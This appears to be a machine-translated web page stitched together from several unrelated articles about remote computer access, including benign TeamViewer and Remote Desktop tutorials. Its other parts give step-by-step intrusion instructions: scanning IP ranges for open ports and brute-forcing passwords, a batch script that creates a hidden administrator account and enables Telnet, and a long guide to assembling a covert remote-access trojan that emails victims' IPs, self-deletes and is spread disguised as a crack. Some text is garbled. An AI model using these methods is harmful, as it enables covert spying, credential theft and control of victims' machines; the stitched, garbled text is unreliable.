Remote access to a computer without the user's knowledge. How to remotely connect to another computer without third-party programs. Why do you need to control another computer via the Internet

Today there is a lot of talk about hacking other people's computers. However, according to many experts in this field, it would be more correct to say not "how to hack someone else's" computer ", but" how to get unauthorized access to it. " In this case, there can be no question of any destructive actions. Let's try to consider the simplest methods with which you can solve the problem of how to get into someone else's "computer".

Fictional bias

Unfortunately, today many users are beginning to develop an increasing fear of their computer terminals being hacked or hacked. Frankly, this is complete nonsense. Who needs you? It is also clear when it is stored on computers or servers Then, yes. Many are not averse to taking advantage of it.

Home computer systems are hacked mostly by hooligan hobbyists who simply have nothing to do. Sometimes, however, there are those who can steal passwords to access sites or codes bank cards(provided that they are stored unencrypted on the home terminal). But this is rare.

Understanding how to get into someone else's "computer", we can say (oddly enough it sounds) that even a child can do this if he has the appropriate utilities and the ability to use them. Let's consider the most primitive methods.

What is computer hacking based on?

In most cases, the simplest but most effective method is used. In principle, the very problem of how to get into someone else's "computer" is reduced only to obtaining the IP address of the computer terminal and one of the victim. What is most interesting, in most cases, many amateurs do not elect someone specifically, but simply scan a predetermined range of IP addresses of vulnerable computer systems, so, just for the sake of interest or testing their strengths.

Therefore, for those who are too afraid for their data, it is better to take care of security in advance by installing the appropriate software.

Using Shared Resource Scanner

So, you are wondering how to enter someone else's "computer". For a start, you can apply one of the most simple ways using the Shared Resource Scanner 6.2 utility.

Before starting work, in (Run menu), for example, in Windows XP, you must enter the command winipcfg to find out your own IP address. A window with your address will appear. It needs to be remembered.

Lamescan program

Now a few words about one more way to learn how to get into someone else's "computer". First, the VNC-scanner GUI 1.2 program is used for the presence of IP addresses with open port 4899 or 3389.

Now, in the Lamescan application, enter the required addresses and select a password. You can think of it yourself, you can download a list of the most frequently used passwords from the Internet. Once a match is found, you can rejoice.

Ethical considerations

In conclusion, I would like to note that this article is not a call to action. Rather, it is general educational material, in no way harmful to users. And those who are going to do this should think about the legality of such actions and considerations of ethics.

funny barbel February 2, 2012 at 02:23 PM

The easiest hidden way to access the desired PC from home network

Hello everyone, this is my first article on Habré, so don't judge strictly. In this post I will describe how you can get remote access to the user's computer in your local network through the command line, bypassing all antiviruses and knowing the syntax a little command line Windows. The article is intended for use only on Windows XP, but if you wish, you can rewrite the code for any other OS Windows family... So let's get started. Overall, this article is written for entry-level users. The most important goal is to get the necessary data (passwords, attendance, summer residences, access to mailboxes, webmoney key files, cookies and other important dandruff) and leave unnoticed without leaving any traces of penetration. So, let's start, I am on a local network with about 5000 users, a network with static or dhcp does not matter, I have an ip address and I am happy. The network has a ton of subnets, the routes of which are registered on the server. The MAC address of the computer is registered with the network administrator, since in my case, it was a condition for connecting to the grid, so my poppy will light up if something happens. To avoid being found, first of all we install virtual machine(I used VmWare 5.1), install XP on it, a port scanner (I used SuperScan 3.00 You can download it) and start the Telnet service. We connect the virtual machine to the network using NAT and thus get a completely different mac-address of the machine looking into the network. We installed all the buzzing virtual machine, let's move on. We open a regular notebook and write a batch file with the following content:

@Echo off
Net user Admin_Support lop / add> nul
Net localgroup net localgroup Ђ¤¬Ёёбва в®al Admin_support / add> nul
Net accounts / maxpwage: unlimited> nul sc config TlntSvr start = auto> nul
Sc start TlntSvr> nul
Reg add "HKLM \ SOFTWARE \ Microsoft \ WindowsNT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList" / v Admin_support / t REG_DWORD / d 0> null
Reg add "HKCU \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ policies \ System" / v DisableRegistryTools / t Reg_dword / d 1 / f> nul Reg add "HKCU \ SOFTWARE \ POLICIES \ Microsoft \ MMC" / v RestrictPemitSnapins / t Reg_dword / d 1 / f> nul del% SestemRoot% \ system32 \ compmgmt.msc> nul
del Start_game.bat

Tags: viruses, hacking, security, information security

Surely not every PC user (especially a beginner) knows that a computer can be easily controlled from a distance, and fully! Those. as if you are sitting and working at your own computer, but from a distance, and do it, for example, from a tablet or another computer. This can be very convenient and, for example, I use this opportunity regularly. Why do I need it? I work a lot on the Internet, but I can't always sit at my computer. Sometimes I need to go somewhere or to someone, but some urgent business appears and I need my computer to open some program, start something, look. Carrying a computer with you always and everywhere is very problematic. It weighs about 4 kg for me, which feels good when carrying it :) But on the other hand, I always have a tablet or smartphone with me, from which at any time and from any place I can connect to my computer, which I leave on at home. And so I can work on it just as if I were at home. Another reason for remote access is the ability to ask some acquaintance or colleague to help you to deal with any problems in the settings, programs on your computer via remote access. Also, you yourself can help someone solve some problem on the computer by connecting remotely to this person. Well, the last thing ... It so happens that required computer is in a hard-to-reach place or you need to walk to it. In this case, too, the easiest way is to connect to it remotely and you're done!

In this article of mine, we will just talk about how to remotely control a computer from any device, and with the help of this guide you will learn how to do it easily even as a completely newbie! We will consider the most, in my opinion, the most convenient program for this business - TeamViewer, and today I will tell you about the main most necessary and useful functions of it. Besides, it is also free for non-commercial use! There are only 2 conditions for remote device control: Internet connection on both devices, and TeamViewer on both devices.

Today, the TeamViewer program is supported, one might say, by all devices:

    Smartphones based on Android, Windows Phone 8 operating systems;

    Tablets on the same Android systems, Windows Phone 8;

    IPad of all modifications;

    Computers based operating system Mac, Linux, Windows.

For all these devices, the TeamViewer application can be downloaded free of charge.

It is also interesting that you can control and vice versa - smartphones and tablets from a stationary computer.

So, let's start to understand the program step by step, starting with the process of its installation.

Installing TeawViewer

    First you need to download the program itself. It is best to download from the official site, since there will always be the most latest version... Go to the official TeamViewer website using the link:

    teamviewer

    At the top of the page that opens, you can't help but notice big button Free full version". Here we press it:

    After downloading the file, find it on your computer and launch it. The file will have the name: "TeamViewer_Setup_ru":

    In the next window of the program, you will be asked to select an option for using TeamViewer. These settings can be changed after installation at any time. If you want to control this computer (on which you are installing the program) remotely, then immediately select the appropriate item. Otherwise, just select "Install".

    Below you must select the item "Personal non-commercial use", since the program is distributed free of charge only for this use case.

    At the end, put a tick “Show additional settings"And press the button" Accept - next ":

    Account control Windows entries may ask you for confirmation to proceed with the installation. Just click "Yes":

    In the next window, we check the path where the program will be installed, and change it if desired. But I recommend leaving the default path. The options below can be omitted. All of them, if necessary, can be set after installation. Click the "Finish" button:

    A quick installation process will begin, which will take from a few seconds to a minute.

This completes the installation of the TeamViewer software! Let's move on to its settings and application.

TeamViewer setup

Setting up uncontrolled access to the computer:


Now we can freely control this computer from any other device, wherever we are in the Internet access zone :) But for this we will deal with the information that we (or anyone else) needs to know so that we can connect to this computer remotely.

Data required for remote control of any device:

Perhaps the most important thing is to know the data by which you can connect remotely to the current computer.

To connect to this computer from another computer / device with TeamViewer installed, you only need to know:

    ID of this computer;

    Password for accessing this computer via TeamViewer (not to be confused with the password for logging into Windows!).

All these data are located in the main window of the program:

According to my example (see image above) to remotely access this computer in this moment i need to point to remote device ID: 900 288 832 and password: 6sx71k.

The TeamViewer ID does not change for each specific computer. Those. the one that is indicated in the window you will always indicate when connecting remotely. There are 2 types of passwords in TeamViewer: temporary (random) and personal (permanent). Now more about this:

Hope you understand the difference in passwords :)

Now let's go through the main most important settings of the program.

Basic program settings:

    To go to all the program settings, open the "Advanced" menu at the top and select the "Options" item:

    We will immediately go to the "General" tab. Here you can enable or disable automatic start TeamViewer software when booting Windows... If you are going to control this computer remotely, then I strongly recommend leaving this item enabled. Then you do not have to start TeamViewer manually, and even more so if you are far away, and TeamViewer is on this computer will not start, you will not be able to connect to it.

    Below you can see a message that you are linked to a previously created account. If you click the Delete button, you can break this link.

    On this tab, there are no more important settings that are not set by default. Go to the next tab "Security".

    On the "Security" tab, we can change the "Personal" password by specifying a new one and repeating it at the very top. Below you can set up a "random" password by specifying the number of characters. By default, this password will always be 6 characters long.

    In the last section, "Rules for connecting to this computer", you can allow or deny remote login using Windows password... The safest way is to leave this parameter the default, i.e. - "Is not allowed". The easiest way to connect is through the TeamViewer password, and it will be safer that way.

    Tab " Remote control". There are important settings here. All of these settings are global - i.e. for any connection. But if you have created an account for yourself (as mentioned), then for each computer added to your personal list, you can set your own connection parameters, but more on that later.

    This is how the settings look on this tab:

    At the very top, you can adjust the image quality when connected to a remote computer. It is better to leave either "Automatic quality selection" or "Optimize speed". I always set the speed optimization to connect to a remote machine and work with almost no delays, even through Mobile Internet... There is only one drawback - the image quality (the way we see the remote computer) will not be the best, but sometimes this is not even noticeable.

    Below, as you can see, the option "Hide wallpaper on a remote machine" is enabled. This means that when connected to a remote computer, the desktop background there will just turn black. I always leave this option on, so as not to waste resources downloading, at times, a large background image.

    Even below are additional settings that are configured for each according to their preferences. For example, if the "Play computer sounds and music" function is enabled, you will hear all sounds accordingly. remote computer.

    It can be useful to enable the "Pass shortcut keys" option. If you enable this option, then having connected to a remote computer, you can use your usual keyboard shortcuts. For example, quickly open the task manager - "Ctrl + Shift + Esc".

    In general, here you configure it as you need it.

    Let's go straight to the Computers & Contacts tab.

    On the "Computers and Contacts" tab, your account settings will be displayed, in which you will then see all the remote computers and users you added. On this tab, you can change account information, as well as display settings for computers.

On this, we have sorted out the basic settings. Now let's move on to the main thing - remote computer control.

The principle of remote computer control

To control a computer or any other device (they must also have TeamViewer installed and configured!), We can, as I said, from any point where there is access to the Internet and we just need to know the ID of the controlled device and its password (random or permanent ). Knowing these 2 parameters, we can control the computer.

Let's try to connect to the computer remotely:

    In the main TeamViewer window, where the "Manage computer" section is located, specify the ID of the computer that we will control in the "Partner ID" field.

    If you created an account, then we can immediately add the computer to our "Favorites" list by clicking the button with the star:

    Before us will open a window with settings for access to a computer, which we add to the list:

    In the image above, I have marked the fields and lists where it is best to make changes:

    • We indicate the password if you know the "personal" password of the remote computer. Otherwise, leave the field blank.

      Please indicate network name a remote computer (for your own convenience). It will appear in the list of your computers.

      Optionally, you can specify a description of the added remote computer for convenience, if you have a large list of them.

      In the "Window" list, I selected "Full Screen Mode". This means that when connecting to a remote TeamViewer computer will display the remote computer in full screen. It will look like you are fully working on that computer. You can choose another option, for example, "Window mode", and then the remote computer will be displayed in the window.

      In the "Quality" list, I always choose "Optimize speed" so as not to sacrifice performance, especially on a slow connection.

      Identity mode is always best set to TeamViewer Identity. Then you just need to know the password set for this or that computer in TeamViewer to connect to it.

    The rest of the settings can be left with the "Inherited" value, because, as a rule, there is no need for them and, as a last resort, you can adjust at any time.

    When the settings are specified, click the "OK" button.

    The computers that you will add to your list will be visible in a separate window, as in my example in the image below:

    In the example, I added a computer named "Test TeamViewer".

    Now that the computer is on the list, to connect to it, simply double-click the left mouse button on its name. If you immediately specified the password, then it will not be requested and the connection will immediately occur (within a couple of seconds).

    Another way to quickly connect to a computer, if for some reason you did not start an account and do not add computers to your favorites list, is just enter the ID in the appropriate field and click "Connect to partner":

    By default, there is just the "Remote control" mode, which is what we need. And we can turn on the "File Transfer" mode at any time already during a remote session.

    Now a window will be displayed where you need to enter the password to connect to the remote computer:

    Enter the password and click the "Login" button.

    Connection usually takes a couple of seconds, but this depends, respectively, on the speed of the Internet from one side and the other. After connecting to the remote computer, the window will look like this:

    As you can see, the screen of the remote computer is black. As you probably remember, in the settings we left the option "Hide wallpaper on the remote machine" enabled. As a result, the wallpaper on the remote machine turned black, which will reduce resource consumption, and immediately after disconnecting from the remote computer, its desktop wallpaper will return to its previous appearance.

It's so simple and easy to connect to a remote computer :)

You can fully control your computer at any distance, and at the same time it will look exactly as if you are sitting at that computer.

Let me remind you once again that the same can be done from almost any device. If you, for example, have an iPad, then download TeamViewer on it (it's always free!), Enter the ID and password of the remote computer, and that's it! You will connect and be able to control it directly from the tablet, and it is also very convenient!

Now let's look at some of the functions available to us during a remote session.

Features available during a session remote work on a computer using TeamViewer:

So, we are connected to a remote computer. At the top we see a panel with a set of functions. Let's go through the most necessary ones:

    The button numbered "1" allows you to break the connection with the remote computer at the moment.
    After any termination of a TeamViewer session on both devices, a window will appear indicating that the free session has ended. Just always click OK:

    You can also instantly disconnect the connection while behind that remote computer. For example, someone remotely assists you in setting up the system or fixes some problem. If suddenly that person began to do some actions on your computer that, in your opinion, he absolutely does not need to do, then you can cut off the connection with only one button in the form of a cross (see the image below):

    The button numbered "2" allows you to hide this panel of functions of the remote session.

    The button numbered "3" allows you to instantly switch to full screen mode, which I use 99% of the time.

    A very useful feature is file transfer from local computer to the remote and back. You can do this with a simple drag and drop. required files from your computer window to the remote computer window.

    Another way is to use a special manager - "File Transfer". It opens from the same panel that is fixed at the top. We select the item "File Transfer", and then again "File Transfer":

    A special manager - explorer will open. There is also nothing difficult here. We indicate from which folder of the local computer the file will be transferred, then we indicate the folder where the file will be transferred to the remote computer. Then we select the file itself on the local computer, which we will transfer and press the "Send" button:

    The file will be transferred to the remote computer. In my example, I was transferring an image file called "" from the Downloads folder to the desktop of the remote computer:

    After transferring the necessary data, you can close the file transfer manager, and a window will be displayed with the statistics of the transfer of your files, where you need to click "Close" again:

    Or you can minimize this window.

    There are 3 more very useful functions that are available during the remote session. This is the ability to voice communication, video broadcasting and chat support.

    All 3 of these functions can be activated by selecting the Audio / Video menu:


    Here you can change the scaling, for example, enable full screen mode. Here, in the "Quality" submenu, you can select the quality you need for displaying content on the remote computer, for example, by turning on "Optimize speed". Also here you can change the resolution of the remote computer (for example, if the resolution of your local computer is very different) and show / hide the wallpaper on the remote computer. Everything else is not so essential and necessary ...

Well, this is perhaps the most useful thing you need to know about how to remotely control a computer using TeamViewer :) Cool program, isn't it? :)

The most important thing is that it is extremely simple, convenient, even a beginner can handle it. And, of course, it's free! In general, to be honest, I have not seen the best worthy replacement for the TeamViewer program.

And now I think that in a couple of weeks I will complete the article, and you will be able to familiarize yourself with the next testing of the new autoclicker!

Well, now I say goodbye to you for a week ... Good luck and always good mood! ;)

Good day everyone!

Today we will be doing a hidden assembly of the Remote Manipulator System (analogue of Radmin, Teamviewer)
I warn you right away that it is quite difficult to assemble, especially for beginners.

I will try to explain everything step by step and in an accessible language.
RMS (like Radmin, TeamViewer, etc.) performs the same function - remote administration (i.e. control) of the computer

What can RMS do?
All of its functions are listed here:
-Management and supervision
-File manager
-Text chat
-Task Manager
-Connection via Internet-ID! (same as TeamViewer)
-Device Manager
-Connecting to the command line
-Record screen on schedule
-Simple text message
-Support for multiple monitors
-Remote installation
-Wake-On-Lan
-Remote registry.
-Function "Run"
-Connection to a web-camera.
-Self removal
-Integration with firewall

I'll start by listing what an assembly is:
1. Completely hidden installation (the screen does not blink, unlike Radmin)
2. After launch, the installer will remove itself
3. All assembly files are hidden / systemic, it will be more difficult for the victim to notice something
4. An IP is additionally sent to your mail, but we will not need it, most likely, since we will use the Internet-ID
5. The weight will be ~ 2.8mb
6. This assembly is partially fired by antiviruses (how to do so that it does not fire - write to contacts)

So, let's start collecting:

I. Setting up the RMS server

First of all, download the archive
Attention! The archive has a password

Archive password:
-
Open the R folder, run the server.exe file, install. After the installation is complete, the program will start itself:

A Security window appears in front of us:

Click Change / Set - enter the password, let's say 12345678rms
Go to the Authentication tab, there should be a checkmark - Level 3
Next, click OK! Everything, the window disappears.

The next step for us will be setting up the server
In the lower right corner, click right click by blue icon
Setting up Internet-ID connection
Click Get new ID, something similar appears:

The next step for us will be the second part of the server setup:
open Start, Programs, Remote Manipulator System - Server, Settings for R-Server

There will be two steps, the first one we have already passed ("safety").
2. Startup Mode - Automatic
3. Settings, uncheck all the checkboxes, put only on "disable closing RMS", also in the Logging tab, the checkbox should be unchecked.
4. License key- enter this:
-

5. Close the Settings

Open the directory where the server was installed and select the following files:

Copy, create a folder somewhere, paste everything there.
It is in this folder that all the most interesting will happen for us, hereinafter I will call this folder “ New folder

We continue to work. Now we need to export our settings with passwords and all settings.

To do this, we need to do the following:

For XP, WIN + R: regedit
For 7, just in the line "find programs and files" enter regedit, and Ok
Go here: HKEY_LOCAL_MACHINE / SYSTEM / then export the Remote Manipulator System

And we indicate the path of our created folder (set the file name - sets) into which we copied our server files, this is what you should get:

The sets.reg file itself is a settings file, all your settings are stored there, if you want to change something, you only need to replace this file by doing all the previous steps.

II. Editing an Installer

Well, let's move on to the main part.

Select install.bat, right-click to change
(the first half of the code serves to remove the previously installed Radmin, Rem_Cam, and if it was installed earlier on the victim's computer, then RMS, we don't need someone else to have access to the computer besides us).

There are two simple steps:
1. Create mail on Yandex (!):
2. Please, do not be stupid here, so that there are no questions later!
We find it almost at the very end and edit this for ourselves:

### LOGIN ### - this is ONLY a login, WITHOUT adding @ yandex.ru, ### PASSWORD ### - 12345678, here we clearly indicate our data from registration in Yandex.
Close, save.

Select the setup.exe file in the New Folder, right-click to open the archive.
Select everything that is in the New Folder (except for setup.exe, of course) and drag it into the window that opens. We've successfully added files to the archive.

As a result, you should get this:

Copy our setup.exe file somewhere.
You can delete everything else from the folder.

III. Completion

So, open the R folder, install the Viewer.exe file, through it we will connect to the "victim" using the Internet-ID.

Important!
If you are going to throw your assembly to several "victims" at once, then there will be problems with the Internet ID, since it is assigned to one assembly for one computer.
If you are going to distribute hidden rms in large quantities, then in this case you need to connect to each "victim" by IP

As I personally advise you to use this assembly.
You throw it to any one victim, it sets it up. Then you can connect using the Internet-ID (which you copied above). Have done everything you need on the victim's computer and then delete the assembly from the victim's computer
For this you need:
Connect to the victim and select the "Launch programs" connection - Browse - from the victim, go to the windows \ system32 directory there, find the de.exe file, select. (Check the "hidden launch" checkbox)

The de.exe file is included in the assembly. This is a self-deleting file that completely removes your hidden rms assembly from the victim's computer.

After running this file from the victim, it is better to check whether the assembly has been deleted (for this we just try to connect again), if we cannot, this means the assembly was successfully deleted and we can use our assembly on another victim in the same way as on the first one.
This is done to avoid conflicts between two computers with the same Internet-ID.

The big advantage of this assembly will be that the connection will be one hundred percent! Even if the victim has a dynamic IP (or behind NAT).

Also, this assembly is integrated with the firewall. In the settings, you can enable traffic saving, in this case everything will work faster and eat less traffic.
I was also pleased with the built-in scanner for RMS servers. If you suddenly lost your victim with a dynamic IP, you can easily find it by scanning the IP range in which it is located (for example 92.72.0.0-92.72.255.255)

In general - try, write reviews, throw THANKS

Optionally, create a downloader

What exactly is this downloader and what is it for?
This is an.exe file, which immediately after startup, self-deletes, downloads the file and installs, after startup, it removes itself without leaving any traces.

So, let's begin!

Everything you need is in the Downloader folder

So, we need to register a server on Yandex.
You should already have mail on Yandex, where the IP comes. From this account we will register our server, where we will upload our assembly.

For this:
1. Log in to your Yandex account
2. Follow the link http: //narоd.yаndеx.ru/
3. Click "Create site" (we don't need a site, only a file manager)
4. When our site is created, go to the file manager, ****. Narod2.yandex.ru/filemanager/
5. Select "Upload file", load our RMS assembly
6. After the file is loaded, there should be such a gray button "link", click, copy.

Let's say we already have a server on Yandex where our file is located. Ok, let's move on.
Next, unpack our downloaded archive, open the link folder, and change the winupd.bat file.
### LINK ### - address to file
### DOWNLOADED "FILENAME ### - file name

Batch file: open our batch file - winupd.bat
Save us: leave it as it is
We put the rest as in the picture, it should look like this:
Options tab:

In the Include tab, add the wget.exe file
Include tab:

The next step for us is to put the winupd.exe file in a shell, which will drop it and then self-delete.
Click on the load.exe file, open the archive, drag the winupd.exe file into the load.exe file

Everything! Our downloader is ready!

For non-falsity and convenience, you can sell our file to someone under the guise of a crack, patch, image, etc. (I’ll say right away, it’s impossible to create an installer with the extension .jpg, .mp3, except that before that, having rummaged in the victim's registry, well, this is nonsense, better use SI)

Express RMS changes:

Simplified setup (enter your login and password in the textbook)
- After reboot, resends the IP
- There are now only 6 files in the installer:
- Installation is much faster

Please do not contact me in a personal with a request to give a key on which restrictions, for all questions, as well as for new versions of assemblies, write to me on the contacts (below)

tags: hidden rms 5.5 5.4, hidden rms remote administration, hidden rms with sending the ID and password to the mail, remote manipulator system 5.5, hidden administration, remote administration, remote manipulator system, hidden rms, hidden control computer, rms remote access, remote access, hidden view webcams, hidden webcams

Hello everybody! Today I will show how can you connect remotely to a computer without third-party programs.

How to connect to remote desktop

There are already so many programs for remote connection to the computer exists that even the eyes run up. I'm not talking about computers, there are already a lot of them on the phones, you can create whatever you want!

But! It happens that there is no Internet at hand, for example, or slow Internet, although the 21st century is in the yard, but this also happens!

And why the program, if you need, for example standard means... For this case, Windows made standard and fairly convenient control.

The controls are really simple, but they work stably. To implement it, you must have a password for account and make sure the checkbox is checked allow remote assistance connections to this computer.

This checkbox is located if you right-click on my computer - property (or control panel - system) - additional parameters - remote control.

If the checkbox is checked, you can proceed to control your computer!

We go to start - all programs are standard - Connecting to a remote desktop

Or, in the command, type mstsc and enter.

In the window that appears, enter the IP address of the computer to which you want to connect. If you do not know your IP address, then you can find out from my article,. If the computer is outside the network, then use the external ip address, and if in your network, then use the internal one.

In order not to do the same procedures next time, you can save the connection to the desktop.

And so, we enter the IP address, click connect, then we agree with the certificate and when another computer appears, enter the password for the account and voila, we are connected!

This is how you can connect remotely to a computer without third-party programs!